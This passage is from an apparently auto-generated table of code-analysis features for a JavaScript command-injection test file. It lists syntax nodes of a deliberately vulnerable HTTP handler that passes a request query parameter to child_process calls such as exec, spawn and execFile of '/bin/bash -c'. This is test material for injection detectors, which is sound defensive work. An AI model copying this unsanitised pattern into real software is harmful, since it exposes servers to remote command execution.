c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | exceptional return of cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | exceptional return of cp.exec ... : cmd}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:5:31:30 | exceptional return of cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:8:31:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:8:31:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:8:31:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:8:31:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:8:31:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:13:31:17 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:20:31:29 | {uid: cmd} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:23 | uid | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:23 | uid | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:23 | uid | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:23 | uid | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:23 | uid | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:21:31:28 | uid: cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | InputAccessPathFromCallee | 1.uid | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | assignedToPropName | uid | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:11 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:11 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:11 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:11 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:11 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | cp.exec ... : cmd}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | exceptional return of cp.exec ... : cmd}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | exceptional return of cp.exec ... : cmd}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | exceptional return of cp.exec ... : cmd}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:5:32:30 | exceptional return of cp.exec ... : cmd}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:8:32:11 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:8:32:11 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:8:32:11 | exec | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:8:32:11 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:8:32:11 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:13:32:17 | "foo" | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:20:32:29 | {gid: cmd} | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:23 | gid | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:23 | gid | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:23 | gid | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:23 | gid | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:23 | gid | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:21:32:28 | gid: cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile 